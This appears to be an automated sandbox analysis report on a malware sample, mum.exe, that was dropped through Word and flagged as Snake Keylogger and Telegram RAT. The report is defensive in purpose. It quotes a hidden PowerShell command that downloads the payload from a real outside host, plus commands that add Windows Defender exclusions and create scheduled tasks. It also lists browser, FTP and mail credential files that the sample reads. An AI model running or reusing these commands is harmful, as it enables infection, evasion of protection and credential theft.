Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 45877	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 45877
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\mum.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareTSOFTWARE\Oracle\VirtualBox Guest AdditionsFSELECT * FROM Win32_VideoController
Source: mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II2VM Additions S3 Trio32/64
Source: mum.exe, 00000008.00000002.958509160.00000000007FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware_S
Source: mum.exe, 0000001D.00000002.1049675121.0000000000616000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\6HARDWARE\Description\System"SystemBiosVersion
Source: mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mum.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mum.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mum.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mum.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\mum.exe

Code function: 15_2_002C9151 LdrInitializeThunk,

15_2_002C9151

Source: C:\Users\user\AppData\Roaming\mum.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects files into Windows application

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Injected file: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\System32\notepad.exe	Injected file: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

.NET source code references suspicious native API functions

Source: 15.0.mum.exe.400000.0.unpack, u0097?ufffd?t/B?ufffd??.cs	Reference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
Source: 15.0.mum.exe.400000.0.unpack, ??ufffd??/ufffdufffd??ufffd.cs	Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')

Bypasses PowerShell execution policy

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\mum.exe	Memory written: C:\Users\user\AppData\Roaming\mum.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory written: C:\Users\user\AppData\Roaming\mum.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory written: C:\Users\user\AppData\Roaming\mum.exe base: 400000 value starts with: 4D5A

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Queries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Queries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\mum.exe	Queries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mum.exe	Queries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\mum.exe	Queries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mum.exe	Queries volume information: C:\Users\user\AppData\Roaming\mum.exe VolumeInformation
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT VolumeInformation

Source: C:\Users\user\AppData\Roaming\mum.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\mum.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\mum.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mum.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\mum.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\mum.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\mum.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mum.exe PID: 1484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mum.exe PID: 828, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Scripting	1 Scheduled Task/Job	211 Process Injection	21 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	12 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
